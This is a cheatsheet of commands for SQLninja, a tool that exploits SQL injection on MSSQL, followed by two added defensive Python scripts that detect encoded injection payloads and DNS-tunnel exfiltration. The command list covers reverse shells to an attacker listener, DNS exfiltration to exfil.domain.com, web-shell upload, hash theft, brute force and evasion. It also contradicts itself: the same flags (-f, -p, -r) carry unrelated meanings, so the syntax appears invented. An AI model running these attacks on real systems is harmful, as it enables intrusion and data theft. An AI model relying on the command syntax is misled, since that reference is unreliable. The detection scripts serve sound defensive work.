SQLninja Cheatsheet: Exploiting SQL Injection on MSSQL

SQLninja is an open-source tool for exploiting SQL injection vulnerabilities in applications backed by Microsoft SQL Server. Penetration testers use it to escalate privileges, obtain shell access, and automate exploitation once an injection point has been confirmed. This cheatsheet collects the essential commands, usage syntax, attack modes, and practical tips for red teamers and penetration testers.

The Ultimate SQL Injection Tool Reference Guide

Basic SQLninja Usage

Start SQLninja
    sqlninja
        Launch SQLninja in interactive mode.
Load Configuration
    sqlninja -f config_file
        Load options from a configuration file.
Set Target URL
    sqlninja -u "http://target.com/vuln.php?id=1"
        Specify the vulnerable URL.
Set POST Parameter
    sqlninja -p "user=admin&pass=test"
        Specify POST parameters for injection.
Verbose Mode
    sqlninja -v
        Enable verbose output.
Debug Mode
    sqlninja -d
        Enable debug output (very verbose).
Set HTTP Method
    sqlninja -m GET|POST
        Specify the HTTP method (GET or POST).
Set Injection Parameter
    sqlninja -g "parameter"
        Specify the GET parameter to inject into.

Fingerprinting Commands

Basic Fingerprinting
    sqlninja -f fingerprint
        Perform basic fingerprinting of the DBMS.
Check DB Version
    sqlninja -f version
        Retrieve database version information.
Check Current User
    sqlninja -f user
        Retrieve the current database user.
Check DB Name
    sqlninja -f dbname
        Retrieve the current database name.
Check Hostname
    sqlninja -f hostname
        Retrieve the server hostname.
Check if SA
    sqlninja -f issa
        Check whether the current user is SA (sysadmin).
Check xp_cmdshell
    sqlninja -f xpcmdshell
        Check whether xp_cmdshell is available.
Check Linked Servers
    sqlninja -f links
        Check for linked SQL servers.

Exploitation Commands

Upload and Execute
    sqlninja -f upload_exec -l /local/file -r /remote/file
        Upload a local file and execute it on the remote server.
Direct Shell
    sqlninja -f directsh -a "command"
        Execute a command via direct shell.
Reverse Shell
    sqlninja -f revsh -l local_ip -p local_port
        Spawn a reverse shell to your listener.
DNS Tunnel
    sqlninja -f dnstunnel -d domain.com
        Create a DNS tunnel for data exfiltration.
Metasploit Integration
    sqlninja -f metasploit -l local_ip -p local_port
        Generate a Metasploit payload and handler.
VNC Injection
    sqlninja -f vnc -l local_ip -p local_port
        Inject a VNC server and connect to it.
Privilege Escalation
    sqlninja -f esca
        Attempt privilege escalation.
Steal Hashes
    sqlninja -f stealhashes
        Extract password hashes from the database.

File Operations

Upload File
    sqlninja -f upload -l /local/file -r /remote/file
        Upload a local file to the remote server.
Download File
    sqlninja -f download -r /remote/file -l /local/file
        Download a file from the remote server.
Read File
    sqlninja -f readfile -r /remote/file
        Read the contents of a remote file.
Dir Listing
    sqlninja -f dir -r /remote/dir
        List the contents of a remote directory.
Check Write Permissions
    sqlninja -f writable -r /remote/dir
        Check whether a directory is writable.
Find Web Root
    sqlninja -f findwebroot
        Attempt to locate the web root directory.

Shell Operations

Spawn OS Shell
    sqlninja -f os_shell
        Spawn an interactive operating system shell.
SQL Shell
    sqlninja -f sql_shell
        Spawn an interactive SQL shell.
Execute Single Command
    sqlninja -f exec -a "command"
        Execute a single OS command.
Execute SQL Query
    sqlninja -f query -a "SELECT * FROM users"
        Execute a SQL query.
Bind Shell
    sqlninja -f bind -p port
        Create a bind shell on the specified port.
ICMP Shell
    sqlninja -f icmpsh -l local_ip
        Create an ICMP shell (ping tunnel).

Brute Force Attacks

Brute Force SA Password
    sqlninja -f bruteforce -w wordlist.txt
        Brute force the SA account password.
Dictionary Attack
    sqlninja -f dictionary -w wordlist.txt
        Dictionary attack against SQL logins.
Brute Force with Rules
    sqlninja -f rules -w wordlist.txt -r rules.txt
        Brute force with mutation rules.
Brute Force NTLM Hashes
    sqlninja -f ntlmbrute -h hashes.txt
        Brute force recovered NTLM hashes.

Evasion Techniques

Hex Encoding
    sqlninja -x
        Use hex encoding for evasion.
Random Case
    sqlninja -r
        Use random case for evasion.
String Splitting
    sqlninja -s
        Use string splitting for evasion.
Delay Between Requests
    sqlninja -t milliseconds
        Add a delay between requests.
Use Proxy
    sqlninja -P http://proxy:port
        Route traffic through a proxy.
Tamper Scripts
    sqlninja --tamper tamper_script
        Use custom tamper scripts for evasion.
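The evasion techniques listed above (hex encoding, random case, string splitting, plus ordinary and double URL encoding) are exactly what a detection rule has to undo before a plain substring match on the web server's access log can work. The following Python script is an added example written for this page; it is not part of the original cheatsheet or of the SQLninja project. It extracts the request target from access-log lines, reverses each of those encodings, and then looks for MSSQL indicators such as xp_cmdshell and WAITFOR DELAY. The log lines, the indicator list and the log format are constructed for the example.

```python
import re
from urllib.parse import unquote, unquote_plus

# Constructed access-log excerpt (Apache combined-style). Lines 2 to 6 carry the
# same indicator under different encodings; lines 1 and 7 are ordinary traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /vuln.asp?id=1 HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /vuln.asp?id=1%3BEXEC%20master..xP_CmDsHeLl-- HTTP/1.1" 500 120
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /vuln.asp?id=1%3BEXEC(0x78705f636d647368656c6c)-- HTTP/1.1" 500 120
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /vuln.asp?id=1%3BEXEC(%27xp_%27%2B%27cmd%27%2B%27shell%27)-- HTTP/1.1" 500 120
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /vuln.asp?id=1%3BWAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:06 +0000] "GET /vuln.asp?id=1%3BEXEC(CHAR(120)%2BCHAR(112)%2BCHAR(95)%2BCHAR(99)%2BCHAR(109)%2BCHAR(100)%2BCHAR(115)%2BCHAR(104)%2BCHAR(101)%2BCHAR(108)%2BCHAR(108))-- HTTP/1.1" 500 120
10.0.0.5 - - [01/Jan/2024:10:00:07 +0000] "GET /theme.asp?color=0xff&page=2 HTTP/1.1" 200 512
"""

# MSSQL indicators that SQLninja-style exploitation depends on. This is a
# deliberately short, constructed list, not a complete signature set.
INDICATORS = ("xp_cmdshell", "sp_configure", "sp_oacreate", "waitfor delay", "master..", "openrowset")

_REQUEST = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/[\d.]+"')
_COMMENT = re.compile(r"/\*.*?\*/")                          # /**/ used in place of spaces
_HEX = re.compile(r"0x((?:[0-9a-f]{2})+)", re.IGNORECASE)    # 0x78705f... literals
_CHARSEQ = re.compile(r"n?char\(\s*\d{1,3}\s*\)(?:\s*\+\s*n?char\(\s*\d{1,3}\s*\))*", re.IGNORECASE)
_CHARNUM = re.compile(r"\d{1,3}")
_SPLIT = re.compile(r"'\s*\+\s*'")                           # 'xp_'+'cmd'+'shell'


def _decode_hex(match: re.Match) -> str:
    """Turn a 0x... literal back into text when it decodes to printable ASCII."""
    raw = bytes.fromhex(match.group(1))
    try:
        text = raw.decode("ascii")
    except UnicodeDecodeError:
        return match.group(0)          # binary value such as 0xff: leave untouched
    return text if text.isprintable() else match.group(0)


def normalize(target: str) -> str:
    """Undo the encodings from the Evasion Techniques section so plain matching works."""
    s = unquote_plus(target)           # first pass: %XX, and '+' means space in a query string
    for _ in range(2):                 # peel double or triple URL encoding
        decoded = unquote(s)           # later passes keep a literal '+' (T-SQL concatenation)
        if decoded == s:
            break
        s = decoded
    s = _COMMENT.sub(" ", s)
    s = _HEX.sub(_decode_hex, s)
    s = _CHARSEQ.sub(lambda m: "".join(chr(int(n)) for n in _CHARNUM.findall(m.group(0))), s)
    s = _SPLIT.sub("", s)              # rejoin split string literals
    return re.sub(r"\s+", " ", s).lower()   # random case collapses here


def scan_line(line: str) -> list:
    """Indicators found in one access-log line (empty list if none or no request field)."""
    match = _REQUEST.search(line)
    if not match:
        return []
    norm = normalize(match.group(1))
    return [ind for ind in INDICATORS if ind in norm]


def scan_log(text: str) -> list:
    """Return [(line_number, [indicators...])] for every line that matches."""
    hits = []
    for number, line in enumerate(text.splitlines(), 1):
        found = scan_line(line)
        if found:
            hits.append((number, found))
    return hits


if __name__ == "__main__":
    for number, found in scan_log(SAMPLE_LOG):
        print(f"line {number}: {', '.join(found)}")
```

Decoding is done before matching rather than by adding encoded variants to the indicator list, because hex, CHAR() and split-literal forms can be combined freely; one normalizer covers all of them. Hex literals that do not decode to printable ASCII (such as the colour value on the last sample line) are left alone, which keeps the benign request from matching.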

Common Attack Scenarios

Full Attack Chain
    sqlninja -u "http://target.com/vuln.php?id=1" -f fingerprint,upload_exec,revsh -l 192.168.1.100 -p 4444
        Complete attack from fingerprinting to reverse shell.
Stealthy Data Exfiltration
    sqlninja -u "http://target.com/vuln.php?id=1" -f query,dnstunnel -a "SELECT * FROM users" -d exfil.domain.com
        Exfiltrate query results via a DNS tunnel.
Web Shell Deployment
    sqlninja -u "http://target.com/vuln.php?id=1" -f upload -l webshell.php -r /var/www/html/ws.php
        Upload a web shell to the server.
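The DNS tunnel mode (listed under Exploitation Commands and used in the "Stealthy Data Exfiltration" scenario above) carries query results inside hostname lookups for a domain the operator controls, so the defender's vantage point is the resolver's query log. The following Python script is an added example for this page, not code from the original cheatsheet or the SQLninja project. It groups queries by parent domain and flags domains that receive many distinct, long, high-entropy subdomain lookups. The log format, the 32-character sample labels and the thresholds are assumptions made for the example.

```python
import math
from collections import Counter, defaultdict

# Constructed DNS query log: "<timestamp> <client> <qname> <qtype>".
# The 32-character labels under exfil.domain.com imitate encoded query results
# carried in hostnames; the example.com and microsoft.com lookups are ordinary traffic.
SAMPLE_DNS_LOG = """\
2024-01-01T10:00:01 10.0.0.9 www.example.com A
2024-01-01T10:00:02 10.0.0.9 mail.example.com A
2024-01-01T10:00:03 10.0.0.9 5f3a9c1e7b2d8064a1b2c3d4e5f60789.exfil.domain.com A
2024-01-01T10:00:04 10.0.0.9 0f1e2d3c4b5a69789a8b7c6d5e4f3021.exfil.domain.com A
2024-01-01T10:00:05 10.0.0.9 cdn.example.com A
2024-01-01T10:00:06 10.0.0.9 fedcba98765432100123456789abcdef.exfil.domain.com A
2024-01-01T10:00:07 10.0.0.9 13579bdf02468aceace02468bdf13579.exfil.domain.com A
2024-01-01T10:00:08 10.0.0.9 api.example.com A
2024-01-01T10:00:09 10.0.0.9 7a6b5c4d3e2f19088091f2e3d4c5b6a7.exfil.domain.com A
2024-01-01T10:00:10 10.0.0.9 c3b2a1f0e9d876544567d8e9f0a1b2c3.exfil.domain.com A
2024-01-01T10:00:11 10.0.0.9 www.example.com A
2024-01-01T10:00:12 10.0.0.9 login.microsoft.com A
"""


def shannon_entropy(text: str) -> float:
    """Bits per character of a label; hex-encoded data sits near 4.0, words near 2 to 3."""
    if not text:
        return 0.0
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())


def parent_domain(qname: str, levels: int = 2) -> str:
    # Simplification for the example: the last two labels are treated as the
    # registered domain. A real deployment would consult the public suffix list
    # so that names under co.uk and similar suffixes group correctly.
    return ".".join(qname.rstrip(".").lower().split(".")[-levels:])


def analyze(log_text: str, min_queries: int = 5, min_label_len: int = 20,
            min_entropy: float = 3.0, min_long_fraction: float = 0.8) -> dict:
    """Return {parent_domain: stats} for domains whose lookups look like a tunnel."""
    stats = defaultdict(lambda: {"queries": 0, "subdomains": set(), "long": 0, "entropy": 0.0})
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue
        qname = parts[2].rstrip(".").lower()
        parent = parent_domain(qname)
        st = stats[parent]
        st["queries"] += 1
        if qname == parent:
            continue                               # bare domain, no subdomain to inspect
        sub = qname[: -(len(parent) + 1)]          # strip ".parent"
        longest = max(sub.split("."), key=len)     # the label that would carry a payload
        st["subdomains"].add(sub)
        st["entropy"] += shannon_entropy(longest)
        if len(longest) >= min_label_len:
            st["long"] += 1
    flagged = {}
    for parent, st in stats.items():
        if st["queries"] < min_queries:
            continue                               # too little traffic to judge
        long_fraction = st["long"] / st["queries"]
        mean_entropy = st["entropy"] / st["queries"]
        if long_fraction >= min_long_fraction and mean_entropy >= min_entropy:
            flagged[parent] = {
                "queries": st["queries"],
                "unique_subdomains": len(st["subdomains"]),
                "long_fraction": long_fraction,
                "mean_entropy": mean_entropy,
            }
    return flagged


if __name__ == "__main__":
    for domain, info in analyze(SAMPLE_DNS_LOG).items():
        print(domain, info)
```

Three signals are combined on purpose: query volume alone flags any busy CDN, long labels alone flag some legitimate service-discovery names, and entropy alone flags short random hostnames. A domain has to score on all of them before it is reported, and the thresholds are parameters so they can be tuned against a site's own baseline.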
